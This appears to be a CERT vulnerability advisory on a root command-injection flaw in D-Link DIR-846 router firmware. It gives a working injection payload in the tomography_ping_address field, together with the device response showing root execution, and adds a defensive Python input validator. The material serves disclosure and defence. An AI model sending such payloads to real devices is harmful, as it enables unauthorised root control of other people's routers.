D-Link DIR-846 wireless router firmware flaw leads to RCE
- Published by: TWCERT/CC
- Updated: 2019-04-03
- Views: 573
CVE number
Body
●Overview:
D-Link makes Wi-Fi networking products (model: DIR-846). Recently, the researcher bigbear of galaxylab found a firmware vulnerability: once an attacker has obtained the cookies of a logged-in admin session, they can craft a malicious HTTP request that sets the parameters of the network tomography function (SetNetworkTomographySettings), and the injected command runs with root privileges, achieving remote command execution. Since there is no word yet of an official patch, device owners should tighten security controls through password strength and whitelisting.
●Editor's note:
On how the DIR-846 firmware is exploited: first open the portal page (e.g. http://192.168.0.1) and log in with the admin account. This produces the session cookies, which are a required element of the actual exploitation. Next, the SetNetworkTomographySettings parameters are targeted. Tomography means cross-sectional scanning, and adjusting the network-status tomography settings naturally requires system privileges. Carrying admin's cookies, the attacker sends the following HTTP request:
{"SetNetworkTomographySettings":{"tomography_ping_address":"192.168.0.1:id","tomography_ping_number":"1","tomography_ping_size":"12","tomography_ping_timeout":"","tomography_ping_ttl":""}}
{"SetNetworkTomographySettingsResponse":{"SetNetworkTomographySettingsResult":"OK"}}
The result shows that the command executed successfully, and that it ran as root:
{"GetNetworkTomographyResult":""}
{"GetNetworkTomographyResultResponse":{"tomography_ping_result":"uid=0(root)gid=0(root)\n","GetNetworkTomographyResultResult":"OK"}}
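The root cause described above is that the value of tomography_ping_address reaches a shell unfiltered. The following is an added illustration of how a firmware back end should handle that request body, not code from D-Link or from the researchers: a strict allow-list validator for every field, and a builder that hands the values to ping as separate argv entries with no shell in between. The field bounds, the assumed ping flags (Linux iputils) and all function names are assumptions made for this example.

```python
import ipaddress
import re
# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens, 253 chars max.
_HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)*"
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$"
)
# Numeric fields as (key, min, max, required); the bounds are assumed for illustration.
# An empty optional field is skipped, like the empty timeout/ttl strings in the request above.
_NUMERIC_FIELDS = (
    ("tomography_ping_number", 1, 10, True),
    ("tomography_ping_size", 1, 65500, True),
    ("tomography_ping_timeout", 1, 60, False),
    ("tomography_ping_ttl", 1, 255, False),
)
def valid_ping_address(value: str) -> bool:
    """Accept only a literal IP address or an RFC 1123 hostname; ':', ';', '|', '$',
    whitespace and every other shell metacharacter fail both checks and are rejected."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return bool(_HOSTNAME_RE.match(value))

def tomography_errors(settings: dict) -> list:
    """Return validation errors for a SetNetworkTomographySettings body (empty list = OK)."""
    errors = []
    if not valid_ping_address(str(settings.get("tomography_ping_address", ""))):
        errors.append("tomography_ping_address must be an IP address or hostname")
    for key, lo, hi, required in _NUMERIC_FIELDS:
        raw = str(settings.get(key, ""))
        if raw == "" and not required:
            continue
        if not raw.isdigit() or not lo <= int(raw) <= hi:
            errors.append(f"{key} must be an integer in [{lo}, {hi}]")
    return errors

def build_ping_argv(settings: dict) -> list:
    """Turn a validated body into an argv list for subprocess.run(argv, shell=False): each
    value is one argument to ping, never text a shell parses. Flags assume Linux iputils ping."""
    errors = tomography_errors(settings)
    if errors:
        raise ValueError("; ".join(errors))
    s = {k: str(v) for k, v in settings.items()}
    argv = ["ping", "-c", s["tomography_ping_number"], "-s", s["tomography_ping_size"]]
    if s.get("tomography_ping_timeout"):
        argv += ["-W", s["tomography_ping_timeout"]]  # -W: reply timeout in seconds
    if s.get("tomography_ping_ttl"):
        argv += ["-t", s["tomography_ping_ttl"]]  # -t: IP time-to-live
    return argv + [s["tomography_ping_address"]]
```

Fed the request body shown above, tomography_errors rejects the address field and build_ping_argv raises ValueError; the same body with a plain IP address yields the argv list `["ping", "-c", "1", "-s", "12", "192.168.0.1"]`.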
Affected products
Solution
Related links
- https://github.com/PAGalaxyLab/VulInfo/blob/master/D-Link/DIR-846/RCE_0/D-Link%2520DIR-846%2520RCE.m
- https://raw.githubusercontent.com/PAGalaxyLab/VulInfo/master/D-Link/DIR-846/RCE_0/dlink2.png
- https://raw.githubusercontent.com/PAGalaxyLab/VulInfo/master/D-Link/DIR-846/RCE_0/dlink1.png
- https://nvd.nist.gov/vuln/detail/CVE-2018-16408
- http://support.dlink.com.cn/ProductInfo.aspx?m=DIR-846
- https://github.com/PAGalaxyLab/VulInfo/tree/master/D-Link/DIR-846/RCE_0
- http://2a.zol-img.com.cn/product/191/126/ce9CRahcdVZUc.jpg